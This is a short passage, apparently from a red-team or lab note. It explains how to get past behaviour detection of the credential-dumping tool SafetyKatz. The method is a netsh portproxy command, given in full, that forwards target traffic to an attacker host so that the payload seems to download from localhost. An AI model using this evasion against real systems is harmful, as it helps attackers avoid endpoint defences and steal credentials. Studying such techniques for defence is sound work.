bypass behaviour detection of SafetyKatz we need to perform an additional step. We need to forward traffic from local (target) machine to the attacker machine. This way, the download always happens from 127.0.0.1

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=192.168.100.X

Untitled